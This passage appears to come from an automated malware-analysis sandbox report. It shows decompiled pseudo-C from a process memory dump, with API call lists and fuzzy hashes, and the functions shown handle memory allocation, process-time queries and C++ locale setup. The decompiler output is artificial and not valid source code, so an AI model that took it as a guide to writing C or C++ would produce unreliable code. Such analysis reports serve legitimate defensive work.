                                                                                                															__eflags = _t176;
                                                                                                															if(_t176 != 0) {
                                                                                                																CloseHandle(_t176);
                                                                                                																_v52 = 0;
                                                                                                															}
                                                                                                															_t151 = _v24;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                												_t169 = _v32;
                                                                                                												__eflags = _t151;
                                                                                                												_t103 =  ==  ? _v28 : _t169;
                                                                                                												_t168 = _t169 + 4;
                                                                                                												_v28 = _t103;
                                                                                                												_v32 = _t168;
                                                                                                												__eflags = _t168 - _v40;
                                                                                                											} while (_t168 != _v40);
                                                                                                										}
                                                                                                									}
                                                                                                									 *[fs:0x0] = _v20;
                                                                                                									return _t103;
                                                                                                								} else {
                                                                                                									_t14 = _t142 + 0x23; // 0x23
                                                                                                									_t179 = _t14 & 0xffffffe0;
                                                                                                									 *(_t179 - 4) = _t142;
                                                                                                									_t166 = _v28;
                                                                                                									L12:
                                                                                                									_v24 = _t179;
                                                                                                									L13:
                                                                                                									_v8 = 0;
                                                                                                									_t154 = _t179 + _t166 * 4;
                                                                                                									_v28 = _t154;
                                                                                                									 *_t154 =  *_a8;
                                                                                                									_t127 = _t174[1];
                                                                                                									_t155 =  *_t174;
                                                                                                									_t170 = _a4;
                                                                                                									if(_a4 != _t174[1]) {
                                                                                                										E00F95C10(_t179, _t155, _t170 - _t155);
                                                                                                										__eflags = _t174[1] - _a4;
                                                                                                										E00F95C10(_v28 + 4, _a4, _t174[1] - _a4);
                                                                                                										_t189 = _t189 + 0x18;
                                                                                                									} else {
                                                                                                										E00F95C10(_t179, _t155, _t127 - _t155);
                                                                                                										_t189 = _t189 + 0xc;
                                                                                                									}
                                                                                                									_v8 = 0xffffffff;
                                                                                                									_t158 =  *_t174;
                                                                                                									if(_t158 == 0) {
                                                                                                										L22:
                                                                                                										 *_t174 = _t179;
                                                                                                										_t174[1] = _t179 + _v36 * 4;
                                                                                                										_t174[2] = _t143 + _t179;
                                                                                                										 *[fs:0x0] = _v16;
                                                                                                										return _v28;
                                                                                                									} else {
                                                                                                										if((_t174[2] - _t158 & 0xfffffffc) < 0x1000) {
                                                                                                											L20:
                                                                                                											if(_t158 != 0) {
                                                                                                												LocalFree(_t158);
                                                                                                											}
                                                                                                											goto L22;
                                                                                                										} else {
                                                                                                											_t166 =  *(_t158 - 4);
                                                                                                											_t148 = _t158 - _t166;
                                                                                                											if(_t148 - 4 > 0x1f) {
                                                                                                												goto L25;
                                                                                                											} else {
                                                                                                												_t158 = _t166;
                                                                                                												goto L20;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}



















































                                                                                                0x00f74550
                                                                                                0x00f74553
                                                                                                0x00f74555
                                                                                                0x00f74560
                                                                                                0x00f74561
                                                                                                0x00f74564
                                                                                                0x00f74567
                                                                                                0x00f7456e
                                                                                                0x00f74572
                                                                                                0x00f74578
                                                                                                0x00f7457b
                                                                                                0x00f7457d
                                                                                                0x00f74584
                                                                                                0x00f74587
                                                                                                0x00f7458f
                                                                                                0x00f74597
                                                                                                0x00f746e1
                                                                                                0x00f746e1
                                                                                                0x00000000
                                                                                                0x00f7459d
                                                                                                0x00f7459d
                                                                                                0x00f7459d
                                                                                                0x00f745a0
                                                                                                0x00f745a8
                                                                                                0x00f745ad
                                                                                                0x00f745b8
                                                                                                0x00f745c1
                                                                                                0x00f745c4
                                                                                                0x00f745c6
                                                                                                0x00f745c9
                                                                                                0x00f745ba
                                                                                                0x00f745ba
                                                                                                0x00f745bc
                                                                                                0x00f745bc
                                                                                                0x00f745d1
                                                                                                0x00f746dc
                                                                                                0x00f746dc
                                                                                                0x00000000
                                                                                                0x00f745d7
                                                                                                0x00f745d7
                                                                                                0x00f745e4
                                                                                                0x00f74610
                                                                                                0x00f74612
                                                                                                0x00f74627
                                                                                                0x00f74627
                                                                                                0x00000000
                                                                                                0x00f74614
                                                                                                0x00f74617
                                                                                                0x00f7461d
                                                                                                0x00f7461f
                                                                                                0x00f74622
                                                                                                0x00f74622
                                                                                                0x00000000
                                                                                                0x00f745e6
                                                                                                0x00f745e6
                                                                                                0x00f745e6
                                                                                                0x00f745eb
                                                                                                0x00000000
                                                                                                0x00f745f1
                                                                                                0x00f745f4
                                                                                                0x00f745fc
                                                                                                0x00f746e6
                                                                                                0x00f746e6
                                                                                                0x00f746f1
                                                                                                0x00f746fa
                                                                                                0x00f746ff
                                                                                                0x00f74700
                                                                                                0x00f74703
                                                                                                0x00f74705
                                                                                                0x00f74710
                                                                                                0x00f74714
                                                                                                0x00f74715
                                                                                                0x00f74716
                                                                                                0x00f74717
                                                                                                0x00f7471e
                                                                                                0x00f74722
                                                                                                0x00f74728
                                                                                                0x00f7472a
                                                                                                0x00f7472d
                                                                                                0x00f7472f
                                                                                                0x00f74731
                                                                                                0x00f74734
                                                                                                0x00f74736
                                                                                                0x00f7473c
                                                                                                0x00f7473f
                                                                                                0x00f74742
                                                                                                0x00f74744
                                                                                                0x00f74750
                                                                                                0x00f74750
                                                                                                0x00f74752
                                                                                                0x00f7475c
                                                                                                0x00f7475f
                                                                                                0x00f74768
                                                                                                0x00f7476a
                                                                                                0x00f74771
                                                                                                0x00f74774
                                                                                                0x00f74789
                                                                                                0x00f7478b
                                                                                                0x00f74792
                                                                                                0x00f74795
                                                                                                0x00f74799
                                                                                                0x00f7479c
                                                                                                0x00f74853
                                                                                                0x00f74853
                                                                                                0x00f74857
                                                                                                0x00f7485e
                                                                                                0x00f74860
                                                                                                0x00f74863
                                                                                                0x00f74865
                                                                                                0x00f74865
                                                                                                0x00f7486c
                                                                                                0x00f74873
                                                                                                0x00f7487a
                                                                                                0x00f7487c
                                                                                                0x00f7487f
                                                                                                0x00f74881
                                                                                                0x00f74881
                                                                                                0x00f74888
                                                                                                0x00f74888
                                                                                                0x00f747a2
                                                                                                0x00f747a2
                                                                                                0x00f747a5
                                                                                                0x00000000
                                                                                                0x00f747ab
                                                                                                0x00f747b6
                                                                                                0x00f747c7
                                                                                                0x00f747d0
                                                                                                0x00f747d3
                                                                                                0x00f7480f
                                                                                                0x00f74819
                                                                                                0x00f74819
                                                                                                0x00f7481d
                                                                                                0x00f74824
                                                                                                0x00f74826
                                                                                                0x00f74829
                                                                                                0x00f7482b
                                                                                                0x00f7482b
                                                                                                0x00f74832
                                                                                                0x00f74839
                                                                                                0x00f74840
                                                                                                0x00f74842
                                                                                                0x00f74845
                                                                                                0x00f74847
                                                                                                0x00f74847
                                                                                                0x00f7484e
                                                                                                0x00f74811
                                                                                                0x00f74814
                                                                                                0x00f74817
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f74817
                                                                                                0x00f747d5
                                                                                                0x00f747d5
                                                                                                0x00f747d5
                                                                                                0x00f747d9
                                                                                                0x00f747e0
                                                                                                0x00f747e2
                                                                                                0x00f747e5
                                                                                                0x00f747e7
                                                                                                0x00f747e7
                                                                                                0x00f747ee
                                                                                                0x00f747f5
                                                                                                0x00f747fc
                                                                                                0x00f747fe
                                                                                                0x00f74801
                                                                                                0x00f74803
                                                                                                0x00f74803
                                                                                                0x00f7480a
                                                                                                0x00f7480a
                                                                                                0x00f747d3
                                                                                                0x00f747a5
                                                                                                0x00f7488a
                                                                                                0x00f7488d
                                                                                                0x00f74891
                                                                                                0x00f74895
                                                                                                0x00f74898
                                                                                                0x00f7489b
                                                                                                0x00f7489e
                                                                                                0x00f7489e
                                                                                                0x00f74750
                                                                                                0x00f74744
                                                                                                0x00f748aa
                                                                                                0x00f748b8
                                                                                                0x00f74602
                                                                                                0x00f74602
                                                                                                0x00f74605
                                                                                                0x00f74608
                                                                                                0x00f7460b
                                                                                                0x00f74629
                                                                                                0x00f74629
                                                                                                0x00f7462c
                                                                                                0x00f7462c
                                                                                                0x00f74633
                                                                                                0x00f74636
                                                                                                0x00f7463e
                                                                                                0x00f74640
                                                                                                0x00f74643
                                                                                                0x00f74645
                                                                                                0x00f7464a
                                                                                                0x00f74660
                                                                                                0x00f74671
                                                                                                0x00f74676
                                                                                                0x00f7467b
                                                                                                0x00f7464c
                                                                                                0x00f74651
                                                                                                0x00f74656
                                                                                                0x00f74656
                                                                                                0x00f7467e
                                                                                                0x00f74685
                                                                                                0x00f74689
                                                                                                0x00f746b4
                                                                                                0x00f746b4
                                                                                                0x00f746bc
                                                                                                0x00f746c2
                                                                                                0x00f746cb
                                                                                                0x00f746d9
                                                                                                0x00f7468b
                                                                                                0x00f74698
                                                                                                0x00f746a9
                                                                                                0x00f746ab
                                                                                                0x00f746ae
                                                                                                0x00f746ae
                                                                                                0x00000000
                                                                                                0x00f7469a
                                                                                                0x00f7469a
                                                                                                0x00f7469d
                                                                                                0x00f746a5
                                                                                                0x00000000
                                                                                                0x00f746a7
                                                                                                0x00f746a7
                                                                                                0x00000000
                                                                                                0x00f746a7
                                                                                                0x00f746a5
                                                                                                0x00f74698
                                                                                                0x00f74689
                                                                                                0x00f745fc
                                                                                                0x00f745eb
                                                                                                0x00f745e4
                                                                                                0x00f745d1

                                                                                                APIs
                                                                                                • LocalAlloc.KERNEL32(00000040,00000025,FD8FA683,?,?,00000000,?,FD8FA683,00000000,?,00000000,000000FF,?,00F739B2,?,?), ref: 00F745F4
                                                                                                • LocalFree.KERNEL32(?,?,?,FD8FA683,?,?,00000000,?,FD8FA683,00000000,?), ref: 00F746AE
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,FD8FA683,?,?,00000002), ref: 00F74762
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,FD8FA683,?,?,00000002), ref: 00F74783
                                                                                                • GetProcessTimes.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,FD8FA683,?,?,00000002), ref: 00F747B6
                                                                                                • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,FD8FA683,?,?,00000002), ref: 00F747C7
                                                                                                • CloseHandle.KERNEL32(00000000,?,FD8FA683,?,?,00000002), ref: 00F747E5
                                                                                                • CloseHandle.KERNEL32(00000000,?,FD8FA683,?,?,00000002), ref: 00F74801
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Process$CloseHandleLocalOpenTimes$AllocFree
                                                                                                • String ID:
                                                                                                • API String ID: 4152282797-0
                                                                                                • Opcode ID: f5daf493e16b2390667eef448628701d94bf733e0a7d2e05c4b842105e6e93b1
                                                                                                • Instruction ID: 2541cfc5c374f7130722a1e3d718eecf54bfef2da1dcf26dd7e288cb1e3e05cc
                                                                                                • Opcode Fuzzy Hash: f5daf493e16b2390667eef448628701d94bf733e0a7d2e05c4b842105e6e93b1
                                                                                                • Instruction Fuzzy Hash: 9B81C571E006099FDB14DF98CD85BAEFBB5FB49760F20822AE519E72C0D730A905DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E00F783C0() {
                                                                                                				intOrPtr _v8;
                                                                                                				signed int _v16;
                                                                                                				char _v24;
                                                                                                				signed int _v32;
                                                                                                				char _v36;
                                                                                                				signed int _v40;
                                                                                                				char _v44;
                                                                                                				char _v60;
                                                                                                				char _v108;
                                                                                                				char _v160;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t57;
                                                                                                				signed int _t62;
                                                                                                				signed int _t65;
                                                                                                				signed int _t67;
                                                                                                				signed int _t71;
                                                                                                				signed int _t74;
                                                                                                				void* _t80;
                                                                                                				void* _t82;
                                                                                                				signed int _t87;
                                                                                                				signed int _t88;
                                                                                                				void* _t89;
                                                                                                				signed int _t92;
                                                                                                				signed int _t98;
                                                                                                				signed int _t103;
                                                                                                				intOrPtr* _t106;
                                                                                                				signed int _t108;
                                                                                                				void* _t113;
                                                                                                				signed int _t116;
                                                                                                				void* _t117;
                                                                                                				void* _t123;
                                                                                                
                                                                                                				_t89 = _t113;
                                                                                                				_t116 = (_t113 - 0x00000008 & 0xfffffff8) + 4;
                                                                                                				_v8 =  *((intOrPtr*)(_t89 + 4));
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb621b);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_push(_t89);
                                                                                                				_t117 = _t116 - 0x88;
                                                                                                				_t57 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t57 ^ _t116);
                                                                                                				 *[fs:0x0] =  &_v24;
                                                                                                				_v32 = 0;
                                                                                                				E00F856E6( &_v44, 0);
                                                                                                				_v16 = 0;
                                                                                                				_t103 =  *0xfd0968; // 0x0
                                                                                                				_t62 =  *0xfd1520; // 0x0
                                                                                                				_v40 = _t62;
                                                                                                				if(_t103 == 0) {
                                                                                                					E00F856E6( &_v36, _t103);
                                                                                                					_v16 = 1;
                                                                                                					_t123 =  *0xfd0968 - _t103; // 0x0
                                                                                                					if(_t123 == 0) {
                                                                                                						_t87 =  *0xfd0954; // 0x0
                                                                                                						_t88 = _t87 + 1;
                                                                                                						 *0xfd0954 = _t88;
                                                                                                						 *0xfd0968 = _t88;
                                                                                                					}
                                                                                                					_v16 = 0;
                                                                                                					E00F8573E( &_v36);
                                                                                                					_t103 =  *0xfd0968; // 0x0
                                                                                                				}
                                                                                                				_t92 =  *( *((intOrPtr*)(_t89 + 8)) + 4);
                                                                                                				if(_t103 >=  *((intOrPtr*)(_t92 + 0xc))) {
                                                                                                					_t106 = 0;
                                                                                                					__eflags = 0;
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t92 + 8)) + _t103 * 4));
                                                                                                					if(_t106 != 0) {
                                                                                                						L24:
                                                                                                						_v16 = 0xffffffff;
                                                                                                						E00F8573E( &_v44);
                                                                                                						 *[fs:0x0] = _v24;
                                                                                                						return _t106;
                                                                                                					} else {
                                                                                                						L8:
                                                                                                						if( *((char*)(_t92 + 0x14)) == 0) {
                                                                                                							L11:
                                                                                                							if(_t106 != 0) {
                                                                                                								goto L24;
                                                                                                							}
                                                                                                							L12:
                                                                                                							_t65 = _v40;
                                                                                                							if(_t65 == 0) {
                                                                                                								_t108 = LocalAlloc(0x40, 0x44);
                                                                                                								_v40 = _t108;
                                                                                                								_v16 = 2;
                                                                                                								__eflags = _t108;
                                                                                                								if(_t108 == 0) {
                                                                                                									_t106 = 0;
                                                                                                									__eflags = 0;
                                                                                                								} else {
                                                                                                									_t98 =  *( *((intOrPtr*)(_t89 + 8)) + 4);
                                                                                                									__eflags = _t98;
                                                                                                									if(_t98 == 0) {
                                                                                                										_t74 = 0xfc76d9;
                                                                                                									} else {
                                                                                                										_t74 =  *(_t98 + 0x18);
                                                                                                										__eflags = _t74;
                                                                                                										if(_t74 == 0) {
                                                                                                											_t74 = _t98 + 0x1c;
                                                                                                										}
                                                                                                									}
                                                                                                									E00F78E20( &_v160, _t108, _t74);
                                                                                                									_v16 = 3;
                                                                                                									_v32 = 1;
                                                                                                									 *_t108 = 0xfb83d0;
                                                                                                									_v16 = 4;
                                                                                                									 *_t108 = 0xfb83e0;
                                                                                                									 *(_t108 + 4) = 0;
                                                                                                									_v16 = 5;
                                                                                                									 *_t108 = 0xfb83f4;
                                                                                                									_v16 = 6;
                                                                                                									 *_t108 = 0xfb93ec;
                                                                                                									E00F858BF(_t103, _t108, __eflags,  &_v60);
                                                                                                									asm("movups xmm0, [eax]");
                                                                                                									asm("movups [esi+0x8], xmm0");
                                                                                                									_t80 = E00F85A28(__eflags,  &_v108);
                                                                                                									_t117 = _t117 + 8;
                                                                                                									asm("movups xmm0, [eax]");
                                                                                                									asm("movups [esi+0x18], xmm0");
                                                                                                									asm("movups xmm0, [eax+0x10]");
                                                                                                									asm("movups [esi+0x28], xmm0");
                                                                                                									asm("movq xmm0, [eax+0x20]");
                                                                                                									asm("movq [esi+0x38], xmm0");
                                                                                                									 *((intOrPtr*)(_t108 + 0x40)) =  *((intOrPtr*)(_t80 + 0x28));
                                                                                                									_v16 = 3;
                                                                                                								}
                                                                                                								_v16 = 0;
                                                                                                								_t67 = _v32;
                                                                                                								__eflags = _t67 & 0x00000001;
                                                                                                								if((_t67 & 0x00000001) != 0) {
                                                                                                									_t71 = _t67 & 0xfffffffe;
                                                                                                									__eflags = _t71;
                                                                                                									_v32 = _t71;
                                                                                                									E00F79300();
                                                                                                								}
                                                                                                								_v40 = _t106;
                                                                                                								_v16 = 8;
                                                                                                								E00F85472(_t106);
                                                                                                								 *((intOrPtr*)( *_t106 + 4))();
                                                                                                								 *0xfd1520 = _t106;
                                                                                                								_v40 = 0;
                                                                                                								_v16 = 0;
                                                                                                							} else {
                                                                                                								_t106 = _t65;
                                                                                                							}
                                                                                                							goto L24;
                                                                                                						}
                                                                                                						_t82 = E00F8549E();
                                                                                                						if(_t103 >=  *((intOrPtr*)(_t82 + 0xc))) {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t82 + 8)) + _t103 * 4));
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                			}




































                                                                                                0x00f783c1
                                                                                                0x00f783c9
                                                                                                0x00f783d0
                                                                                                0x00f783d6
                                                                                                0x00f783d8
                                                                                                0x00f783e3
                                                                                                0x00f783e4
                                                                                                0x00f783e5
                                                                                                0x00f783ed
                                                                                                0x00f783f4
                                                                                                0x00f783f8
                                                                                                0x00f78404
                                                                                                0x00f78407
                                                                                                0x00f7840c
                                                                                                0x00f78413
                                                                                                0x00f78419
                                                                                                0x00f7841e
                                                                                                0x00f78423
                                                                                                0x00f78429
                                                                                                0x00f7842e
                                                                                                0x00f78432
                                                                                                0x00f78438
                                                                                                0x00f7843a
                                                                                                0x00f7843f
                                                                                                0x00f78440
                                                                                                0x00f78445
                                                                                                0x00f78445
                                                                                                0x00f7844a
                                                                                                0x00f78451
                                                                                                0x00f78456
                                                                                                0x00f78456
                                                                                                0x00f7845f
                                                                                                0x00f78465
                                                                                                0x00f78477
                                                                                                0x00f78477
                                                                                                0x00000000
                                                                                                0x00f78467
                                                                                                0x00f7846a
                                                                                                0x00f7846f
                                                                                                0x00f785b4
                                                                                                0x00f785b4
                                                                                                0x00f785be
                                                                                                0x00f785c8
                                                                                                0x00f785d8
                                                                                                0x00f78475
                                                                                                0x00f78479
                                                                                                0x00f7847d
                                                                                                0x00f7848f
                                                                                                0x00f78491
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f78497
                                                                                                0x00f78497
                                                                                                0x00f7849c
                                                                                                0x00f784af
                                                                                                0x00f784b1
                                                                                                0x00f784b4
                                                                                                0x00f784b8
                                                                                                0x00f784ba
                                                                                                0x00f7856b
                                                                                                0x00f7856b
                                                                                                0x00f784c0
                                                                                                0x00f784c3
                                                                                                0x00f784c6
                                                                                                0x00f784c8
                                                                                                0x00f784d6
                                                                                                0x00f784ca
                                                                                                0x00f784ca
                                                                                                0x00f784cd
                                                                                                0x00f784cf
                                                                                                0x00f784d1
                                                                                                0x00f784d1
                                                                                                0x00f784cf
                                                                                                0x00f784e2
                                                                                                0x00f784e7
                                                                                                0x00f784f0
                                                                                                0x00f784f3
                                                                                                0x00f784f9
                                                                                                0x00f78500
                                                                                                0x00f78506
                                                                                                0x00f7850d
                                                                                                0x00f78514
                                                                                                0x00f7851a
                                                                                                0x00f78525
                                                                                                0x00f7852b
                                                                                                0x00f78533
                                                                                                0x00f7853a
                                                                                                0x00f7853e
                                                                                                0x00f78543
                                                                                                0x00f78546
                                                                                                0x00f78549
                                                                                                0x00f7854d
                                                                                                0x00f78551
                                                                                                0x00f78555
                                                                                                0x00f7855a
                                                                                                0x00f78562
                                                                                                0x00f78565
                                                                                                0x00f78565
                                                                                                0x00f7856d
                                                                                                0x00f78574
                                                                                                0x00f78577
                                                                                                0x00f78579
                                                                                                0x00f7857b
                                                                                                0x00f7857b
                                                                                                0x00f78584
                                                                                                0x00f78587
                                                                                                0x00f78587
                                                                                                0x00f7858c
                                                                                                0x00f7858f
                                                                                                0x00f78594
                                                                                                0x00f785a0
                                                                                                0x00f785a3
                                                                                                0x00f785a9
                                                                                                0x00f785b0
                                                                                                0x00f7849e
                                                                                                0x00f7849e
                                                                                                0x00f7849e
                                                                                                0x00000000
                                                                                                0x00f7849c
                                                                                                0x00f7847f
                                                                                                0x00f78487
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7848c
                                                                                                0x00000000
                                                                                                0x00f7848c
                                                                                                0x00f7846f

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F78407
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F78429
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F78451
                                                                                                • LocalAlloc.KERNEL32(00000040,00000044,00000000,FD8FA683,00000000,00000000), ref: 00F784A9
                                                                                                • __Getctype.LIBCPMT ref: 00F7852B
                                                                                                • __Getcvt.LIBCPMT ref: 00F7853E
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F78594
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F785BE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeGetcvtLocalRegister
                                                                                                • String ID:
                                                                                                • API String ID: 3519931779-0
                                                                                                • Opcode ID: 92262020d9253d647da4b7cd97e6a427254ddd7678e9519320c764df198a2ee5
                                                                                                • Instruction ID: 84c2276e94253b8b27752a425752221ce5f6f29bd9291580f5da6f9668e38350
                                                                                                • Opcode Fuzzy Hash: 92262020d9253d647da4b7cd97e6a427254ddd7678e9519320c764df198a2ee5
                                                                                                • Instruction Fuzzy Hash: E9612571C01609DFDB10CF68C94479EBBF4FF14720F14825AD849AB352EB74AA45EB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E00F79020(void* _a4) {
                                                                                                				char _v8;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				signed int _v28;
                                                                                                				char _v32;
                                                                                                				char _v48;
                                                                                                				char _v100;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t52;
                                                                                                				signed int _t57;
                                                                                                				signed int _t60;
                                                                                                				signed int _t62;
                                                                                                				signed int _t66;
                                                                                                				signed int _t69;
                                                                                                				void* _t74;
                                                                                                				signed int _t79;
                                                                                                				signed int _t80;
                                                                                                				signed int _t83;
                                                                                                				signed int _t89;
                                                                                                				signed int _t94;
                                                                                                				intOrPtr* _t97;
                                                                                                				signed int _t99;
                                                                                                				signed int _t100;
                                                                                                				void* _t101;
                                                                                                				void* _t102;
                                                                                                				void* _t105;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb6478);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t102 = _t101 - 0x54;
                                                                                                				_t52 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t52 ^ _t100);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_v20 = 0;
                                                                                                				E00F856E6( &_v32, 0);
                                                                                                				_v8 = 0;
                                                                                                				_t94 =  *0xfd096c; // 0x0
                                                                                                				_t57 =  *0xfd1524; // 0x0
                                                                                                				_v28 = _t57;
                                                                                                				if(_t94 == 0) {
                                                                                                					E00F856E6( &_v24, _t94);
                                                                                                					_v8 = 1;
                                                                                                					_t105 =  *0xfd096c - _t94; // 0x0
                                                                                                					if(_t105 == 0) {
                                                                                                						_t79 =  *0xfd0954; // 0x0
                                                                                                						_t80 = _t79 + 1;
                                                                                                						 *0xfd0954 = _t80;
                                                                                                						 *0xfd096c = _t80;
                                                                                                					}
                                                                                                					_v8 = 0;
                                                                                                					E00F8573E( &_v24);
                                                                                                					_t94 =  *0xfd096c; // 0x0
                                                                                                				}
                                                                                                				_t83 =  *(_a4 + 4);
                                                                                                				if(_t94 >=  *((intOrPtr*)(_t83 + 0xc))) {
                                                                                                					_t97 = 0;
                                                                                                					__eflags = 0;
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 8)) + _t94 * 4));
                                                                                                					if(_t97 != 0) {
                                                                                                						L24:
                                                                                                						_v8 = 0xffffffff;
                                                                                                						E00F8573E( &_v32);
                                                                                                						 *[fs:0x0] = _v16;
                                                                                                						return _t97;
                                                                                                					} else {
                                                                                                						L8:
                                                                                                						if( *((char*)(_t83 + 0x14)) == 0) {
                                                                                                							L11:
                                                                                                							if(_t97 != 0) {
                                                                                                								goto L24;
                                                                                                							}
                                                                                                							L12:
                                                                                                							_t60 = _v28;
                                                                                                							if(_t60 == 0) {
                                                                                                								_t99 = LocalAlloc(0x40, 0x18);
                                                                                                								_v28 = _t99;
                                                                                                								_v8 = 2;
                                                                                                								__eflags = _t99;
                                                                                                								if(_t99 == 0) {
                                                                                                									_t97 = 0;
                                                                                                									__eflags = 0;
                                                                                                								} else {
                                                                                                									_t89 =  *(_a4 + 4);
                                                                                                									__eflags = _t89;
                                                                                                									if(_t89 == 0) {
                                                                                                										_t69 = 0xfc76d9;
                                                                                                									} else {
                                                                                                										_t69 =  *(_t89 + 0x18);
                                                                                                										__eflags = _t69;
                                                                                                										if(_t69 == 0) {
                                                                                                											_t69 = _t89 + 0x1c;
                                                                                                										}
                                                                                                									}
                                                                                                									E00F78E20( &_v100, _t99, _t69);
                                                                                                									_v8 = 3;
                                                                                                									_v20 = 1;
                                                                                                									 *_t99 = 0xfb83d0;
                                                                                                									_v8 = 4;
                                                                                                									 *_t99 = 0xfb83e0;
                                                                                                									 *((intOrPtr*)(_t99 + 4)) = 0;
                                                                                                									_v8 = 5;
                                                                                                									 *_t99 = 0xfb83f4;
                                                                                                									_v8 = 6;
                                                                                                									 *_t99 = 0xfb8404;
                                                                                                									E00F858BF(_t94, _t99, __eflags,  &_v48);
                                                                                                									_t102 = _t102 + 4;
                                                                                                									asm("movups xmm0, [eax]");
                                                                                                									asm("movups [esi+0x8], xmm0");
                                                                                                									_v8 = 3;
                                                                                                								}
                                                                                                								_v8 = 0;
                                                                                                								_t62 = _v20;
                                                                                                								__eflags = _t62 & 0x00000001;
                                                                                                								if((_t62 & 0x00000001) != 0) {
                                                                                                									_t66 = _t62 & 0xfffffffe;
                                                                                                									__eflags = _t66;
                                                                                                									_v20 = _t66;
                                                                                                									E00F79300();
                                                                                                								}
                                                                                                								_a4 = _t97;
                                                                                                								_v8 = 8;
                                                                                                								E00F85472(_t97);
                                                                                                								 *((intOrPtr*)( *_t97 + 4))();
                                                                                                								 *0xfd1524 = _t97;
                                                                                                								_a4 = 0;
                                                                                                								_v8 = 0;
                                                                                                							} else {
                                                                                                								_t97 = _t60;
                                                                                                							}
                                                                                                							goto L24;
                                                                                                						}
                                                                                                						_t74 = E00F8549E();
                                                                                                						if(_t94 >=  *((intOrPtr*)(_t74 + 0xc))) {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t74 + 8)) + _t94 * 4));
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                			}
































                                                                                                0x00f79023
                                                                                                0x00f79025
                                                                                                0x00f79030
                                                                                                0x00f79031
                                                                                                0x00f79036
                                                                                                0x00f7903d
                                                                                                0x00f79041
                                                                                                0x00f7904d
                                                                                                0x00f79050
                                                                                                0x00f79055
                                                                                                0x00f7905c
                                                                                                0x00f79062
                                                                                                0x00f79067
                                                                                                0x00f7906c
                                                                                                0x00f79072
                                                                                                0x00f79077
                                                                                                0x00f7907b
                                                                                                0x00f79081
                                                                                                0x00f79083
                                                                                                0x00f79088
                                                                                                0x00f79089
                                                                                                0x00f7908e
                                                                                                0x00f7908e
                                                                                                0x00f79093
                                                                                                0x00f7909a
                                                                                                0x00f7909f
                                                                                                0x00f7909f
                                                                                                0x00f790a8
                                                                                                0x00f790ae
                                                                                                0x00f790c0
                                                                                                0x00f790c0
                                                                                                0x00000000
                                                                                                0x00f790b0
                                                                                                0x00f790b3
                                                                                                0x00f790b8
                                                                                                0x00f791c8
                                                                                                0x00f791c8
                                                                                                0x00f791d2
                                                                                                0x00f791dc
                                                                                                0x00f791e9
                                                                                                0x00f790be
                                                                                                0x00f790c2
                                                                                                0x00f790c6
                                                                                                0x00f790d8
                                                                                                0x00f790da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f790e0
                                                                                                0x00f790e0
                                                                                                0x00f790e5
                                                                                                0x00f790f8
                                                                                                0x00f790fa
